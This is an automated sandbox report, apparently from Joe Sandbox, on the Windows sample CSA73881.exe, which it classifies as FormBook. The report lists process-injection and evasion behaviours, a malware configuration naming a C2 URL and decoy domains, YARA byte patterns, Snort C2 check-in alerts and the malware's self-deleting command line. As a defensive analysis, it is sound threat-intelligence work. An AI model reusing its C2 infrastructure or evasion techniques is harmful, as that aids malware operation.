Edit tour

Windows Analysis Report
CSA73881.exe

Overview

General Information

Sample Name:	CSA73881.exe
Analysis ID:	680378
MD5:	3ed3236517a40602d654555bc912d926
SHA1:	16dc042b543fe473703e711844f508d353d6d6af
SHA256:	3702b6cfa76e492d56bd9da5f99f7ff805e32c16b3840ee66bb13a812f5d3155
Tags:	exeformbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Writes to foreign memory regions

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Modifies the prolog of user mode functions (user mode inline hooks)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Queues an APC in another process (thread injection)

.NET source code contains very large array initializations

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

CSA73881.exe (PID: 5724 cmdline: "C:\Users\user\Desktop\CSA73881.exe" MD5: 3ED3236517A40602D654555BC912D926)

InstallUtil.exe (PID: 5408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)

explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

control.exe (PID: 3004 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)

cmd.exe (PID: 2972 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 3236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.northpierangling.info/mh76/"], "decoy": ["healthgovcalottery.net", "wenxinliao.com", "rooterphd.com", "bbobbo.one", "american-mes-de-dezembro.xyz", "mintager.com", "thespecialtstore.com", "wemakegreenhomes.com", "occurandmental.xyz", "fidelityrealtytitle.com", "numerisat.asia", "wearestallions.com", "supxl.com", "rajacumi.com", "renaziv.online", "blixtindustries.com", "fjljq.com", "exploretrivenicamping.com", "authenticusspa.com", "uucloud.press", "conclaveraleighapts.com", "moqaq.com", "graphicressie.com", "homebest.online", "yisaco.com", "thedrybonesareawakening.com", "browardhomeappraisal.com", "xn--agroisleos-09a.com", "clinchrecovery.com", "rekoladev.com", "mlbl1.xyz", "tunecaring.com", "avconstant.com", "chelseavictorioustravels.com", "esrfy.xyz", "frijolitoswey.com", "zsfsidltd.com", "natashasadler.com", "kice1.xyz", "drivemytrains.xyz", "shopalthosa.xyz", "merendri.com", "yetkiliveznem7.xyz", "milestonesconstruction.com", "apparodeoexpos.com", "momotou.xyz", "chatkhoneh.com", "cacconsults.com", "kigif-indonesia.com", "segurambiental.com", "verynicegirls.com", "curearrow.com", "fdupcoffee.com", "theclevergolfers.com", "moushimonster.com", "qdchuangyedaikuan.com", "hopefortodayrecovery.com", "wk6agoboyxg6.xyz", "giybetfm.com", "completedn.xyz", "eluawastudio.com", "legacysportsusatexas.com", "comgmaik.com", "intelsearchtech.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x8bc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x192f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x41c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x892a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4849:$sqlite3step: 68 34 1C 7B E1 0x495c:$sqlite3step: 68 34 1C 7B E1 0x4878:$sqlite3text: 68 38 2A 90 C5 0x499d:$sqlite3text: 68 38 2A 90 C5 0x488b:$sqlite3blob: 68 53 D8 7F 8C 0x49b3:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x8bc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x192f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x41c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x892a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4849:$sqlite3step: 68 34 1C 7B E1 0x495c:$sqlite3step: 68 34 1C 7B E1 0x4878:$sqlite3text: 68 38 2A 90 C5 0x499d:$sqlite3text: 68 38 2A 90 C5 0x488b:$sqlite3blob: 68 53 D8 7F 8C 0x49b3:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x99cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x148b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x959a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17849:$sqlite3step: 68 34 1C 7B E1 0x1795c:$sqlite3step: 68 34 1C 7B E1 0x17878:$sqlite3text: 68 38 2A 90 C5 0x1799d:$sqlite3text: 68 38 2A 90 C5 0x1788b:$sqlite3blob: 68 53 D8 7F 8C 0x179b3:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.315621485.00000000033A4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x103b5:$a1: 3C 30 50 4F 53 54 74 09 40 0x14b33:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x28409:$a1: 3C 30 50 4F 53 54 74 09 40 0x51429:$a1: 3C 30 50 4F 53 54 74 09 40 0x3ed78:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x67d98:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2cb87:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x55ba7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x37a6f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x60a8f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2bac0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2bd3a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x54ae0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x54d5a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3786d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6088d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x37359:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x60379:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x3796f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x6098f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x37ae7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x60b07:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2c752:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x55772:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x365d4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x5f5f4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2d44b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x5646b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x3dadf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x66aff:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x3eae2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x3aa01:$sqlite3step: 68 34 1C 7B E1 0x3ab14:$sqlite3step: 68 34 1C 7B E1 0x63a21:$sqlite3step: 68 34 1C 7B E1 0x63b34:$sqlite3step: 68 34 1C 7B E1 0x3aa30:$sqlite3text: 68 38 2A 90 C5 0x3ab55:$sqlite3text: 68 38 2A 90 C5 0x63a50:$sqlite3text: 68 38 2A 90 C5 0x63b75:$sqlite3text: 68 38 2A 90 C5 0x3aa43:$sqlite3blob: 68 53 D8 7F 8C 0x3ab6b:$sqlite3blob: 68 53 D8 7F 8C 0x63a63:$sqlite3blob: 68 53 D8 7F 8C 0x63b8b:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6449:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cdb8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xabc7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15aaf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9b00:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9d7a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x158ad:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15399:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x159af:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15b27:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa792:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14614:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb48b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1bb1f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1cb22:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18a41:$sqlite3step: 68 34 1C 7B E1 0x18b54:$sqlite3step: 68 34 1C 7B E1 0x18a70:$sqlite3text: 68 38 2A 90 C5 0x18b95:$sqlite3text: 68 38 2A 90 C5 0x18a83:$sqlite3blob: 68 53 D8 7F 8C 0x18bab:$sqlite3blob: 68 53 D8 7F 8C
0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: CSA73881.exe PID: 5724	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1e8b2b:$a1: 3C 30 50 4F 53 54 74 09 40 0x22c227:$a1: 3C 30 50 4F 53 54 74 09 40 0x22e039:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: InstallUtil.exe PID: 5408	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x371c1:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: control.exe PID: 3004	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xfad6a:$a1: 3C 30 50 4F 53 54 74 09 40 0x132be5:$a1: 3C 30 50 4F 53 54 74 09 40 0x16d80c:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.0.InstallUtil.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
14.0.InstallUtil.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
14.0.InstallUtil.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
14.0.InstallUtil.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
0.2.CSA73881.exe.ee70000.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 34.102.136.180

Timestamp:	192.168.2.334.102.136.18049841802031412 08/08/22-14:28:06.715465
SID:	2031412
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 103.224.182.210

Timestamp:	192.168.2.3103.224.182.21049846802031453 08/08/22-14:29:11.618333
SID:	2031453
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 103.224.182.210

Timestamp:	192.168.2.3103.224.182.21049846802031412 08/08/22-14:29:11.618333
SID:	2031412
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 34.102.136.180

Timestamp:	192.168.2.334.102.136.18049841802031449 08/08/22-14:28:06.715465
SID:	2031449
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 103.224.182.210

Timestamp:	192.168.2.3103.224.182.21049846802031449 08/08/22-14:29:11.618333
SID:	2031449
Source Port:	49846
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.3 - Destination IP: 34.102.136.180

Timestamp:	192.168.2.334.102.136.18049841802031453 08/08/22-14:28:06.715465
SID:	2031453
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected FormBook

Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Source: CSA73881.exe

Avira: detected

Antivirus detection for URL or domain

Source: www.northpierangling.info/mh76/

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.browardhomeappraisal.com	Virustotal: Detection: 6%	Perma Link
Source: segurambiental.com	Virustotal: Detection: 8%	Perma Link
Source: www.segurambiental.com	Virustotal: Detection: 5%	Perma Link

Machine Learning detection for sample

Source: CSA73881.exe

Joe Sandbox ML: detected

Source: 14.0.InstallUtil.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp

